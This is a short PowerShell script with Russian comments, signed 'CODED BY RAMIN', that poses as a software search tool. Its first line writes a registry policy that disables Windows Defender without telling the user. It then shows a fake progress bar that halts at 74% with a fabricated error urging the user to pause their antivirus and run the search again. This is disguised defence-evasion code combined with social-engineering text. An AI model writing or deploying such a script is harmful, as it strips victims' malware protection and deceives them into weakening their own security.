reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

Write-Host "Начат поиск П.О"
    Write-Host "CODED BY RAMIN" -ForegroundColor DarkGreen -BackgroundColor White
function Show-Progress {
    param (
        [int]$PercentComplete
    )
    

    $progressBarLength = 50  # Длина визуального индикатора
    $filledLength = [math]::Round(($PercentComplete / 100) * $progressBarLength)

   
    $progressBar = "[" + ("#" * $filledLength) + (" " * ($progressBarLength - $filledLength)) + "]"
    
 
    Write-Host "$progressBar $PercentComplete%"
}


for ($i = 0; $i -le 100; $i++) {
    # Имитируем работу, делая паузу
    Start-Sleep -Milliseconds 69  # задержка 50 мс
    
    
    if ($i -eq 74) {
        Show-Progress 74
        Write-Host "========================================================================================================================================================"
        Write-Host "ERROR=ERROR=ERROR=ERROR=ERROR=ERROR=ERROR" -ForegroundColor red -BackgroundColor black

        Write-Host "Expression evaluation error at function 'reject' [line 257]: Windows Defender has stopped working. Access error." -ForegroundColor red -BackgroundColor black
        Write-Host "Try pausing the antivirus for a while and restarting the file search." -ForegroundColor red -BackgroundColor black
        break
    }

   
    Show-Progress $i
}
